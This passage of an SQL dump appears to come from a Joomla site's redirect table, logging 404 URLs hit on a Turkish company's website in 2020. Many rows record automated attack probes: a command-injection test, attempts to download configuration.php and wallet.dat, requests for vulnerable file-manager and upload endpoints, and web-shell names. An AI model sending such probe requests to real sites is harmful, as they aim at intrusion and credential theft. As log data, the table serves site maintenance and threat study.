00:00:00',301),(25880,'http://www.3s-technologies.com.tr/tr/include/calendar/calendar-cn.js',NULL,'http://www.3s-technologies.com.tr/include/calendar/calendar-cn.js','',3,0,'2020-08-04 09:41:09','0000-00-00 00:00:00',301),(25881,'http://www.3s-technologies.com.tr/tr/admin/_user/_admin/aspcms_adminadd.asp?action=add',NULL,'http://www.3s-technologies.com.tr/admin/_user/_Admin/AspCms_AdminAdd.asp?action=add','',1,0,'2020-08-04 09:41:09','0000-00-00 00:00:00',301),(25882,'http://www.3s-technologies.com.tr/tr/public/js/wind.js',NULL,'http://www.3s-technologies.com.tr/public/js/wind.js','',3,0,'2020-08-04 09:41:10','0000-00-00 00:00:00',301),(25883,'http://www.3s-technologies.com.tr/tr/js/comm.js',NULL,'http://www.3s-technologies.com.tr/js/comm.js','',3,0,'2020-08-04 09:41:13','0000-00-00 00:00:00',301),(25884,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer',NULL,'','',2,0,'2020-08-05 01:23:12','0000-00-00 00:00:00',301),(25885,'http://3s-technologies.com.tr/en/?type=rss&format=feed2121121121212.1',NULL,'','',1,0,'2020-08-05 05:40:05','0000-00-00 00:00:00',301),(25886,'http://www.3s-technologies.com.tr/tr/qevflxuoubaoo.html',NULL,'','',1,0,'2020-08-07 05:51:38','0000-00-00 00:00:00',301),(25887,'https://3s-technologies.com.tr/tr/index.php/component/users?view=login',NULL,'','',2,0,'2020-08-07 08:09:32','0000-00-00 00:00:00',301),(25888,'http://3s-technologies.com.tr/tr/ijycbtiu.html',NULL,'','',1,0,'2020-08-08 02:28:50','0000-00-00 00:00:00',301),(25889,'http://3s-technologies.com.tr/en/vuln.php?cmd=php -r \'die(pi()*42);\'',NULL,'','',2,0,'2020-08-08 04:34:26','0000-00-00 00:00:00',301),(25890,'http://3s-technologies.com.tr/tr/images/jr.gif',NULL,'','',4,0,'2020-08-08 15:14:32','0000-00-00 00:00:00',301),(25891,'http://3s-technologies.com.tr/en/components/com_foxcontact/_func.php',NULL,'','',2,0,'2020-08-10 06:09:12','0000-00-00 00:00:00',301),(25892,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/kester',NULL,'','',3,0,'2020-08-10 16:18:37','0000-00-00 00:00:00',301),(25893,'http://3s-technologies.com.tr/en/consystem.php',NULL,'','',2,0,'2020-08-10 18:50:47','0000-00-00 00:00:00',301),(25894,'http://3s-technologies.com.tr/en/xmlrpz.php',NULL,'','',2,0,'2020-08-10 19:44:46','0000-00-00 00:00:00',301),(25895,'http://3s-technologies.com.tr/en/prv8.php',NULL,'','',4,0,'2020-08-11 05:55:21','0000-00-00 00:00:00',301),(25896,'http://3s-technologies.com.tr/en/wp-pas.php',NULL,'','',2,0,'2020-08-11 06:52:08','0000-00-00 00:00:00',301),(25897,'http://3s-technologies.com.tr/en/tmp/sfx.php',NULL,'','',2,0,'2020-08-11 12:08:14','0000-00-00 00:00:00',301),(25898,'http://www.3s-technologies.com.tr/en/apple-touch-icon-152x152-precomposed.png',NULL,'','',1,0,'2020-08-11 21:36:56','0000-00-00 00:00:00',301),(25899,'http://www.3s-technologies.com.tr/en/apple-touch-icon-152x152.png',NULL,'','',1,0,'2020-08-11 21:36:57','0000-00-00 00:00:00',301),(25900,'http://3s-technologies.com.tr/tr/admin/login',NULL,'','',3,0,'2020-08-12 13:00:14','0000-00-00 00:00:00',301),(25901,'http://3s-technologies.com.tr/tr/auth',NULL,'','',2,0,'2020-08-12 13:00:16','0000-00-00 00:00:00',301),(25902,'http://www.3s-technologies.com.tr/tr/desktopmodules/admin/radeditorprovider/dialoghandler.aspx',NULL,'','',2,0,'2020-08-12 14:14:02','0000-00-00 00:00:00',301),(25903,'http://www.3s-technologies.com.tr/tr/app_master/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2020-08-12 14:14:06','0000-00-00 00:00:00',301),(25904,'http://www.3s-technologies.com.tr/tr/providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx',NULL,'','',4,0,'2020-08-12 14:14:09','0000-00-00 00:00:00',301),(25905,'http://www.3s-technologies.com.tr/tr/common/admin/jobs2/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2020-08-12 14:14:11','0000-00-00 00:00:00',301),(25906,'http://www.3s-technologies.com.tr/tr/dashboard/usercontrol/cms/page/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2020-08-12 14:14:14','0000-00-00 00:00:00',301),(25907,'http://www.3s-technologies.com.tr/tr/desktopmodules/news/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2020-08-12 14:14:17','0000-00-00 00:00:00',301),(25908,'http://www.3s-technologies.com.tr/tr/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx',NULL,'','',2,0,'2020-08-12 14:14:21','0000-00-00 00:00:00',301),(25909,'http://www.3s-technologies.com.tr/tr/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx',NULL,'','',2,0,'2020-08-12 14:14:24','0000-00-00 00:00:00',301),(25910,'http://www.3s-technologies.com.tr/tr/desktopmodules/tncomments/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2020-08-12 14:14:27','0000-00-00 00:00:00',301),(25911,'http://www.3s-technologies.com.tr/tr/desktopmodules/ya.controls/angularmain/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2020-08-12 14:14:30','0000-00-00 00:00:00',301),(25912,'http://www.3s-technologies.com.tr/tr/desktopmodules/base/editcontrols/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2020-08-12 14:14:33','0000-00-00 00:00:00',301),(25913,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/?itemid=243',NULL,'','',4,0,'2020-08-12 18:01:22','0000-00-00 00:00:00',301),(25914,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/?itemid=429',NULL,'','',5,0,'2020-08-12 18:06:34','0000-00-00 00:00:00',301),(25915,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-10?language=tr-tr&filter_product=',NULL,'','',1,0,'2020-08-13 09:41:45','0000-00-00 00:00:00',301),(25916,'http://mail.3s-technologies.com.tr/tr/assets/global/plugins/jquery-file-upload/server/php/index.php?secure=1',NULL,'','',1,0,'2020-08-14 02:19:33','0000-00-00 00:00:00',301),(25917,'http://mail.3s-technologies.com.tr/tr/assets/plugins/jquery-file-upload/server/php/index.php?secure=1',NULL,'','',1,0,'2020-08-14 02:19:35','0000-00-00 00:00:00',301),(25918,'http://mail.3s-technologies.com.tr/tr/assets/jquery-file-upload/server/php/index.php?secure=1',NULL,'','',1,0,'2020-08-14 02:19:36','0000-00-00 00:00:00',301),(25919,'http://mail.3s-technologies.com.tr/tr/phpformbuilder/plugins/jquery-file-upload/server/php/index.php',NULL,'','',1,0,'2020-08-14 02:19:37','0000-00-00 00:00:00',301),(25920,'http://www.3s-technologies.com.tr/tr/fbemhvhokjqg.html',NULL,'','',1,0,'2020-08-14 03:13:31','0000-00-00 00:00:00',301),(25921,'http://3s-technologies.com.tr/tr/jdhekiftbwctunh.html',NULL,'','',1,0,'2020-08-15 03:48:46','0000-00-00 00:00:00',301),(25922,'http://3s-technologies.com.tr/en/vendor/phpunit/phpunit/license',NULL,'','',1,0,'2020-08-17 08:22:56','0000-00-00 00:00:00',301),(25923,'http://3s-technologies.com.tr/tr/dev/wp-login.php',NULL,'http://3s-technologies.com.tr/dev/wp-login.php','',1,0,'2020-08-17 17:58:23','0000-00-00 00:00:00',301),(25924,'http://3s-technologies.com.tr/tr/m/wp-login.php',NULL,'http://3s-technologies.com.tr/m/wp-login.php','',1,0,'2020-08-18 01:15:26','0000-00-00 00:00:00',301),(25925,'http://www.3s-technologies.com.tr/tr/wp-content/class.php',NULL,'','',2,0,'2020-08-18 03:15:21','0000-00-00 00:00:00',301),(25926,'http://3s-technologies.com.tr/tr/demo/wp-login.php',NULL,'http://3s-technologies.com.tr/demo/wp-login.php','',2,0,'2020-08-18 03:37:50','0000-00-00 00:00:00',301),(25927,'http://mail.3s-technologies.com.tr/tr/phpmyadmin',NULL,'','',2,0,'2020-08-19 01:31:55','0000-00-00 00:00:00',301),(25928,'http://mail.3s-technologies.com.tr/tr/pma',NULL,'','',1,0,'2020-08-19 01:32:01','0000-00-00 00:00:00',301),(25929,'http://mail.3s-technologies.com.tr/tr/myadmin',NULL,'','',1,0,'2020-08-19 01:32:04','0000-00-00 00:00:00',301),(25930,'http://mail.3s-technologies.com.tr/tr/sql',NULL,'','',1,0,'2020-08-19 01:32:06','0000-00-00 00:00:00',301),(25931,'http://mail.3s-technologies.com.tr/tr/mysql',NULL,'','',1,0,'2020-08-19 01:32:08','0000-00-00 00:00:00',301),(25932,'http://mail.3s-technologies.com.tr/tr/mysqladmin',NULL,'','',1,0,'2020-08-19 01:32:09','0000-00-00 00:00:00',301),(25933,'http://mail.3s-technologies.com.tr/tr/db',NULL,'','',1,0,'2020-08-19 01:32:11','0000-00-00 00:00:00',301),(25934,'http://mail.3s-technologies.com.tr/tr/database',NULL,'','',1,0,'2020-08-19 01:32:13','0000-00-00 00:00:00',301),(25935,'http://mail.3s-technologies.com.tr/tr/sql.php',NULL,'','',13,0,'2020-08-19 01:32:18','0000-00-00 00:00:00',301),(25936,'http://mail.3s-technologies.com.tr/tr/phpminiadmin.php',NULL,'','',1,0,'2020-08-19 01:32:20','0000-00-00 00:00:00',301),(25937,'http://www.3s-technologies.com.tr/tr/xxxss',NULL,'','',10,0,'2020-08-20 20:21:31','0000-00-00 00:00:00',301),(25938,'http://www.3s-technologies.com.tr/tr/npibcpqbcwixuzj.html',NULL,'','',1,0,'2020-08-21 02:10:12','0000-00-00 00:00:00',301),(25939,'https://www.3s-technologies.com.tr/en/dmb-elektronik.com/j3.2/index.php/component',NULL,'','',1,0,'2020-08-21 16:29:55','0000-00-00 00:00:00',301),(25940,'https://3s-technologies.com.tr/tr/owa/auth/logon.aspx?replacecurrent=1&url=https://owa.3s-technologies.com.tr/owa/',NULL,'','',77,0,'2020-08-23 19:12:00','0000-00-00 00:00:00',301),(25941,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/tel-lehim',NULL,'','',2,0,'2020-08-24 11:19:57','0000-00-00 00:00:00',301),(25942,'http://3s-technologies.com.tr/tr/kbztwpughtgtjkdx.html',NULL,'','',1,0,'2020-08-25 02:50:29','0000-00-00 00:00:00',301),(25943,'http://www.3s-technologies.com.tr/tr/pma/index.php',NULL,'','',1,0,'2020-08-25 08:59:03','0000-00-00 00:00:00',301),(25944,'http://www.3s-technologies.com.tr/tr/phpmyadmin/index.php',NULL,'','',1,0,'2020-08-25 08:59:05','0000-00-00 00:00:00',301),(25945,'http://3s-technologies.com.tr/en/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',25,0,'2020-08-26 02:38:22','0000-00-00 00:00:00',301),(25946,'http://www.3s-technologies.com.tr/tr/admin/cms_wysiwyg/directive/index',NULL,'','',2,0,'2020-08-26 07:08:14','0000-00-00 00:00:00',301),(25947,'http://www.3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/blank.php?admin=saz',NULL,'','',1,0,'2020-08-26 07:08:17','0000-00-00 00:00:00',301),(25948,'http://www.3s-technologies.com.tr/tr/?option=com_jifile&task=filesystem.download&filename=configuration.php',NULL,'','',1,0,'2020-08-26 07:08:20','0000-00-00 00:00:00',301),(25949,'http://www.3s-technologies.com.tr/tr/?option=com_jtagmembersdirectory&task=attachment&download_file=configuration.php',NULL,'','',1,0,'2020-08-26 07:08:22','0000-00-00 00:00:00',301),(25950,'http://www.3s-technologies.com.tr/tr/images/jdownloads/screenshots/blank.php.j?admin=saz',NULL,'','',1,0,'2020-08-26 07:08:27','0000-00-00 00:00:00',301),(25951,'http://www.3s-technologies.com.tr/tr/media/blank.php?admin=saz',NULL,'','',1,0,'2020-08-26 07:08:27','0000-00-00 00:00:00',301),(25952,'http://www.3s-technologies.com.tr/tr/blank.php?admin=saz',NULL,'','',1,0,'2020-08-26 07:08:28','0000-00-00 00:00:00',301),(25953,'http://3s-technologies.com.tr/tr/dama.php',NULL,'http://site.ru','',3,0,'2020-08-26 11:26:55','0000-00-00 00:00:00',301),(25954,'http://3s-technologies.com.tr/tr/modules/mod_random_image/media-views-rtl.php',NULL,'http://site.ru','',3,0,'2020-08-26 12:00:14','0000-00-00 00:00:00',301),(25955,'http://3s-technologies.com.tr/tr/wp-xml.php',NULL,'http://site.ru','',10,0,'2020-08-26 16:15:25','0000-00-00 00:00:00',301),(25956,'http://3s-technologies.com.tr/tr/wp-cent.php',NULL,'http://site.ru','',5,0,'2020-08-26 17:23:13','0000-00-00 00:00:00',301),(25957,'http://3s-technologies.com.tr/tr/ns.php',NULL,'http://site.ru','',4,0,'2020-08-26 17:55:26','0000-00-00 00:00:00',301),(25958,'http://www.3s-technologies.com.tr/tr/install',NULL,'http://www.3s-technologies.com.tr/install/','',5,0,'2020-08-26 23:47:40','0000-00-00 00:00:00',301),(25959,'http://www.3s-technologies.com.tr/tr/new-site',NULL,'http://www.3s-technologies.com.tr/new-site/','',5,0,'2020-08-26 23:47:42','0000-00-00 00:00:00',301),(25960,'http://3s-technologies.com.tr/index2.php',NULL,'','',2,0,'2020-08-27 01:35:13','0000-00-00 00:00:00',301),(25961,'http://3s-technologies.com.tr/cache/wp_wrong_datlib.php',NULL,'','',4,0,'2020-08-27 01:35:56','0000-00-00 00:00:00',301),(25962,'http://3s-technologies.com.tr/assets/images/wp_wrong_datlib.php',NULL,'','',4,0,'2020-08-27 01:36:24','0000-00-00 00:00:00',301),(25963,'http://3s-technologies.com.tr/en/popcorn.php?ti=kung',NULL,'','',4,0,'2020-08-27 01:37:06','0000-00-00 00:00:00',301),(25964,'http://3s-technologies.com.tr/sites/all/stats.php',NULL,'','',3,0,'2020-08-27 01:51:12','0000-00-00 00:00:00',301),(25965,'http://3s-technologies.com.tr/tr/sllolx.php.suspected',NULL,'http://site.ru','',2,0,'2020-08-27 16:30:30','0000-00-00 00:00:00',301),(25966,'http://3s-technologies.com.tr/tr/sipp/img.php',NULL,'http://site.ru','',3,0,'2020-08-27 19:28:40','0000-00-00 00:00:00',301),(25967,'http://3s-technologies.com.tr/tr/assets/editor/file-upload/server/php/index.php',NULL,'http://www.google.com/','',2,0,'2020-08-28 15:14:20','0000-00-00 00:00:00',301),(25968,'http://www.3s-technologies.com.tr/tr/rjpualboiezgjkmr.html',NULL,'','',1,0,'2020-08-29 16:23:01','0000-00-00 00:00:00',301),(25969,'http://3s-technologies.com.tr/tr/yuqzooirbdafzxz.html',NULL,'','',1,0,'2020-08-31 17:13:01','0000-00-00 00:00:00',301),(25970,'http://mail.3s-technologies.com.tr/tr/phpmyadmin/index.php',NULL,'','',9,0,'2020-08-31 20:32:51','0000-00-00 00:00:00',301),(25971,'http://mail.3s-technologies.com.tr/tr/pma/index.php',NULL,'','',4,0,'2020-08-31 20:32:51','0000-00-00 00:00:00',301),(25972,'http://3s-technologies.com.tr/tr/data/admin/allowurl.txt',NULL,'','',9,0,'2020-09-03 09:01:36','0000-00-00 00:00:00',301),(25973,'http://www.3s-technologies.com.tr/tr/ibwdjbyyykenejj.html',NULL,'','',1,0,'2020-09-05 23:49:18','0000-00-00 00:00:00',301),(25974,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/ddm-novastar',NULL,'','',3,0,'2020-09-06 03:04:21','0000-00-00 00:00:00',301),(25975,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/readme.txt',NULL,'','',2,0,'2020-09-06 05:43:31','0000-00-00 00:00:00',301),(25976,'http://3s-technologies.com.tr/tr//wp-content/plugins/wp-file-manager/readme.txt',NULL,'','',1,0,'2020-09-06 11:02:16','0000-00-00 00:00:00',301),(25977,'http://mail.3s-technologies.com.tr/tr/install',NULL,'http://mail.3s-technologies.com.tr/install/','',6,0,'2020-09-06 17:36:26','0000-00-00 00:00:00',301),(25978,'http://mail.3s-technologies.com.tr/tr/new-site',NULL,'http://mail.3s-technologies.com.tr/new-site/','',6,0,'2020-09-06 17:36:30','0000-00-00 00:00:00',301),(25979,'http://3s-technologies.com.tr/tr/gmjclrjjjyjl.html',NULL,'','',1,0,'2020-09-07 22:56:42','0000-00-00 00:00:00',301),(25980,'http://www.3s-technologies.com.tr/en/joomla/images/pdf/cm602_1sf_09.pdf',NULL,'','',5,0,'2020-09-08 23:35:27','0000-00-00 00:00:00',301),(25981,'http://3s-technologies.com.tr/tr/component/k2/itemlist',NULL,'http://3s-technologies.com.tr/tr/component/k2/itemlist','',1,0,'2020-09-10 06:04:51','0000-00-00 00:00:00',301),(25982,'http://3s-technologies.com.tr/tr/wp-signup.php',NULL,'http://site.ru','',167,0,'2020-09-10 07:05:18','0000-00-00 00:00:00',301),(25983,'http://3s-technologies.com.tr/tr/wp-blog-header.php',NULL,'http://site.ru','',129,0,'2020-09-10 09:42:50','0000-00-00 00:00:00',301),(25984,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'www.google.com','',12,0,'2020-09-10 13:18:23','0000-00-00 00:00:00',301),(25985,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php',NULL,'www.google.com','',2,0,'2020-09-10 13:18:36','0000-00-00 00:00:00',301),(25986,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo',NULL,'','',5,0,'2020-09-10 19:30:35','0000-00-00 00:00:00',301),(25987,'http://3s-technologies.com.tr/tr/wp-mail.php',NULL,'http://site.ru','',182,0,'2020-09-10 19:30:40','0000-00-00 00:00:00',301),(25988,'http://3s-technologies.com.tr/tr/ns.php.suspected',NULL,'http://site.ru','',6,0,'2020-09-11 15:15:58','0000-00-00 00:00:00',301),(25989,'http://3s-technologies.com.tr/tr/wp-activate.php',NULL,'http://site.ru','',157,0,'2020-09-11 18:25:51','0000-00-00 00:00:00',301),(25990,'http://3s-technologies.com.tr/tr/wp_asx.php.suspected',NULL,'http://site.ru','',6,0,'2020-09-11 19:57:14','0000-00-00 00:00:00',301),(25991,'http://www.3s-technologies.com.tr/tr/sitemap.xml.gz',NULL,'','',32,0,'2020-09-13 17:35:05','0000-00-00 00:00:00',301),(25992,'http://3s-technologies.com.tr/tr/ürünlerkl\'b\"nixij/404',NULL,'','',1,0,'2020-09-15 19:03:49','0000-00-00 00:00:00',301),(25993,'https://3s-technologies.com.tr/en/espbhhfxrn7vgwha4/xv7igayaduu0dqpni4gi/jb6guvdojdxywlg83ik4/wxzfnxzmsmznern',NULL,'','',1,0,'2020-09-16 13:26:06','0000-00-00 00:00:00',301),(25994,'https://3s-technologies.com.tr/tr/.well-known/security.txt',NULL,'https://3s-technologies.com.tr/.well-known/security.txt','',10,0,'2020-09-16 13:26:08','0000-00-00 00:00:00',301),(25995,'http://www.3s-technologies.com.tr/tr/dhmyfjmp.html',NULL,'','',1,0,'2020-09-16 17:44:18','0000-00-00 00:00:00',301),(25996,'http://3s-technologies.com.tr/tr/js/common.js',NULL,'http://3s-technologies.com.tr/js/common.js','',3,0,'2020-09-18 12:56:54','0000-00-00 00:00:00',301),(25997,'http://3s-technologies.com.tr/tr/ysrgzwqkhmonx.html',NULL,'','',1,0,'2020-09-18 17:29:02','0000-00-00 00:00:00',301),(25998,'http://www.3s-technologies.com.tr/en/.well-known/assetlinks.json',NULL,'http://www.3s-technologies.com.tr/en/','',7,0,'2020-09-19 10:13:01','0000-00-00 00:00:00',301),(25999,'http://www.3s-technologies.com.tr/en/.well-known/apple-app-site-association',NULL,'http://www.3s-technologies.com.tr/en/','',7,0,'2020-09-19 10:13:01','0000-00-00 00:00:00',301),(26000,'http://3s-technologies.com.tr/tr/e/admin/index.php',NULL,'','',1,0,'2020-09-22 01:57:24','0000-00-00 00:00:00',301),(26001,'http://3s-technologies.com.tr/tr/backups/wallet.dat',NULL,'','',4,0,'2020-09-22 19:37:22','0000-00-00 00:00:00',301),(26002,'http://3s-technologies.com.tr/tr/contact.jsp',NULL,'','',1,0,'2020-09-23 08:23:46','0000-00-00 00:00:00',301),(26003,'http://3s-technologies.com.tr/tr/contactus.html',NULL,'','',1,0,'2020-09-23 08:24:54','0000-00-00 00:00:00',301),(26004,'http://3s-technologies.com.tr/tr/contactus.htm',NULL,'','',1,0,'2020-09-23 08:25:04','0000-00-00 00:00:00',301),(26005,'http://3s-technologies.com.tr/tr/contactus.php',NULL,'','',1,0,'2020-09-23 08:25:04','0000-00-00 00:00:00',301),(26006,'http://3s-technologies.com.tr/tr/contactus.jsp',NULL,'','',1,0,'2020-09-23 08:25:05','0000-00-00 00:00:00',301),(26007,'http://3s-technologies.com.tr/tr/contactus.aspx',NULL,'','',1,0,'2020-09-23 08:25:06','0000-00-00 00:00:00',301),(26008,'http://3s-technologies.com.tr/tr/contactus.asp',NULL,'','',1,0,'2020-09-23 08:25:06','0000-00-00 00:00:00',301),(26009,'http://3s-technologies.com.tr/tr/contactus',NULL,'','',1,0,'2020-09-23 08:25:06','0000-00-00 00:00:00',301),(26010,'http://3s-technologies.com.tr/tr/contact_us.html',NULL,'','',1,0,'2020-09-23 08:25:07','0000-00-00 00:00:00',301),(26011,'http://3s-technologies.com.tr/tr/contact_us.htm',NULL,'','',1,0,'2020-09-23 08:25:07','0000-00-00 00:00:00',301),(26012,'http://3s-technologies.com.tr/tr/contact_us.php',NULL,'','',1,0,'2020-09-23 08:25:08','0000-00-00 00:00:00',301),(26013,'http://3s-technologies.com.tr/tr/contact_us.jsp',NULL,'','',1,0,'2020-09-23 08:25:08','0000-00-00 00:00:00',301),(26014,'http://3s-technologies.com.tr/tr/contact_us.aspx',NULL,'','',1,0,'2020-09-23 08:25:10','0000-00-00 00:00:00',301),(26015,'http://3s-technologies.com.tr/tr/contact_us.asp',NULL,'','',1,0,'2020-09-23 08:25:25','0000-00-00 00:00:00',301),(26016,'http://3s-technologies.com.tr/tr/contact_us',NULL,'','',1,0,'2020-09-23 08:25:30','0000-00-00 00:00:00',301),(26017,'http://3s-technologies.com.tr/tr/contacts.jsp',NULL,'','',1,0,'2020-09-23 08:25:59','0000-00-00 00:00:00',301),(26018,'http://3s-technologies.com.tr/tr/contacts.aspx',NULL,'','',1,0,'2020-09-23 08:25:59','0000-00-00 00:00:00',301),(26019,'http://3s-technologies.com.tr/tr/contacts.asp',NULL,'','',1,0,'2020-09-23 08:26:00','0000-00-00 00:00:00',301),(26020,'http://3s-technologies.com.tr/tr/contact-us.htm',NULL,'','',1,0,'2020-09-23 08:26:01','0000-00-00 00:00:00',301),(26021,'http://3s-technologies.com.tr/tr/contact-us.php',NULL,'','',3,0,'2020-09-23 08:26:02','0000-00-00 00:00:00',301),(26022,'http://3s-technologies.com.tr/tr/contact-us.jsp',NULL,'','',1,0,'2020-09-23 08:26:02','0000-00-00 00:00:00',301),(26023,'http://3s-technologies.com.tr/tr/contact-us.aspx',NULL,'','',1,0,'2020-09-23 08:26:04','0000-00-00 00:00:00',301),(26024,'http://3s-technologies.com.tr/tr/contact-us.asp',NULL,'','',1,0,'2020-09-23 08:26:14','0000-00-00 00:00:00',301),(26025,'http://www.3s-technologies.com.tr/tr/slybxwwlewvaez.html',NULL,'','',1,0,'2020-09-23 20:21:49','0000-00-00 00:00:00',301),(26026,'http://3s-technologies.com.tr/tr/css/album.css',NULL,'','',6,0,'2020-09-24 06:28:16','0000-00-00 00:00:00',301),(26027,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'http://www.google.com/','',8,0,'2020-09-27 06:04:00','0000-00-00 00:00:00',301),(26028,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/lib/files/',NULL,'http://www.google.com/','',1,0,'2020-09-27 12:30:33','0000-00-00 00:00:00',301),(26029,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/lib/files',NULL,'http://www.google.com/','',1,0,'2020-09-27 14:39:24','0000-00-00 00:00:00',301),(26030,'http://3s-technologies.com.tr/tr//blog.php',NULL,'','',1,0,'2020-09-27 17:24:23','0000-00-00 00:00:00',301),(26031,'https://www.3s-technologies.com.tr/tr/wp-includes/js/jquery/jquery.js',NULL,'','',3,0,'2020-09-27 17:33:25','0000-00-00 00:00:00',301),(26032,'http://3s-technologies.com.tr/tr//index.php/component/k2/itemlist',NULL,'','',1,0,'2020-09-27 19:42:49','0000-00-00 00:00:00',301),(26033,'https://3s-technologies.com.tr/tr/wp-includes/js/jquery/jquery.js',NULL,'','',3,0,'2020-09-27 23:49:31','0000-00-00 00:00:00',301),(26034,'http://www.3s-technologies.com.tr/en/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',3,0,'2020-09-28 07:59:32','0000-00-00 00:00:00',301),(26035,'http://3s-technologies.com.tr/tr//modules/mod_simplefileuploadv1.3/elements/xattacker.php?x=attacker',NULL,'','',1,0,'2020-09-28 14:28:41','0000-00-00 00:00:00',301),(26036,'http://3s-technologies.com.tr/tr//tmp/index.php',NULL,'','',1,0,'2020-09-28 16:35:49','0000-00-00 00:00:00',301),(26037,'http://www.3s-technologies.com.tr/en/vendor/phpunit/phpunit/phpunit.xsd',NULL,'','',2,0,'2020-09-28 17:45:31','0000-00-00 00:00:00',301),(26038,'http://3s-technologies.com.tr/tr///index.php?option=com_k2&view=itemlist&task=user&id=62:administrator',NULL,'','',1,0,'2020-09-29 11:52:25','0000-00-00 00:00:00',301),(26039,'http://www.3s-technologies.com.tr/tr/adware',NULL,'','',1,0,'2020-10-01 10:34:35','0000-00-00 00:00:00',301),(26040,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'www.google.com','',4,0,'2020-10-02 00:45:18','0000-00-00 00:00:00',301),(26041,'http://www.3s-technologies.com.tr/tr/ncxxseuahvf.html',NULL,'','',1,0,'2020-10-02 03:21:43','0000-00-00 00:00:00',301),(26042,'http://3s-technologies.com.tr/\rindex.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',2,0,'2020-10-03 03:32:44','0000-00-00 00:00:00',301),(26043,'http://3s-technologies.com.tr/\r/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',1,0,'2020-10-03 03:32:52','0000-00-00 00:00:00',301),(26044,'http://3s-technologies.com.tr/\r/index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2020-10-03 03:32:57','0000-00-00 00:00:00',301),(26045,'http://3s-technologies.com.tr/\r/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2020-10-03 03:33:00','0000-00-00 00:00:00',301),(26046,'http://3s-technologies.com.tr/tr/index.php/component/k2/itemlist/',NULL,'http://3s-technologies.com.tr/tr//index.php/component/k2/itemlist/','',1,0,'2020-10-05 18:40:52','0000-00-00 00:00:00',301),(26047,'http://www.3s-technologies.com.tr/tr/statics/css/crop.css',NULL,'','',2,0,'2020-10-06 06:05:44','0000-00-00 00:00:00',301),(26048,'http://www.3s-technologies.com.tr/tr/js/index.js',NULL,'','',2,0,'2020-10-06 06:05:55','0000-00-00 00:00:00',301),(26049,'http://www.3s-technologies.com.tr/tr/public/simpleboot/css/simplebootadmin.css',NULL,'','',2,0,'2020-10-06 06:06:26','0000-00-00 00:00:00',301),(26050,'http://www.3s-technologies.com.tr/tr/utility/convert/source/d7.2_x1.5/readme.txt',NULL,'','',3,0,'2020-10-06 07:52:52','0000-00-00 00:00:00',301),(26051,'http://3s-technologies.com.tr/tr/install',NULL,'http://3s-technologies.com.tr/install/','',4,0,'2020-10-07 21:13:32','0000-00-00 00:00:00',301),(26052,'http://3s-technologies.com.tr/tr/new-site',NULL,'http://3s-technologies.com.tr/new-site/','',4,0,'2020-10-07 21:13:35','0000-00-00 00:00:00',301),(26053,'http://www.3s-technologies.com.tr/tr/pzohdlwmxblz.html',NULL,'','',1,0,'2020-10-08 08:36:20','0000-00-00 00:00:00',301),(26054,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/changelog.txt',NULL,'','',1,0,'2020-10-09 14:17:14','0000-00-00 00:00:00',301),(26055,'http://www.3s-technologies.com.tr/en/joomla/images/pdf/r256.pdf',NULL,'','',3,0,'2020-10-10 17:01:26','0000-00-00 00:00:00',301),(26056,'http://3s-technologies.com.tr/tr/system/elfinder/php/connector.minimal.php',NULL,'','',1,0,'2020-10-12 07:38:43','0000-00-00 00:00:00',301),(26057,'http://3s-technologies.com.tr/tr/admin/elfinder/php/connector.minimal.php',NULL,'','',6,0,'2020-10-12 07:38:54','0000-00-00 00:00:00',301),(26058,'http://3s-technologies.com.tr/tr/editor/elfinder/php/connector.minimal.php',NULL,'','',1,0,'2020-10-12 07:38:54','0000-00-00 00:00:00',301),(26059,'http://3s-technologies.com.tr/tr/includes/vendor/studio-42/elfinder/php/connector.minimal.php',NULL,'','',1,0,'2020-10-12 07:39:02','0000-00-00 00:00:00',301),(26060,'http://3s-technologies.com.tr/tr/public/tpl/panel/plugins/elfinder2/php/connector.minimal.php',NULL,'','',1,0,'2020-10-12 07:39:03','0000-00-00 00:00:00',301),(26061,'http://www.3s-technologies.com.tr/en/joomla/images/pdf/ape_catalog.pdf',NULL,'','',1,0,'2020-10-13 17:41:57','0000-00-00 00:00:00',301),(26062,'http://3s-technologies.com.tr/tr/chi/home',NULL,'http://3s-technologies.com.tr/tr/chi/home','',1,0,'2020-10-13 19:49:04','0000-00-00 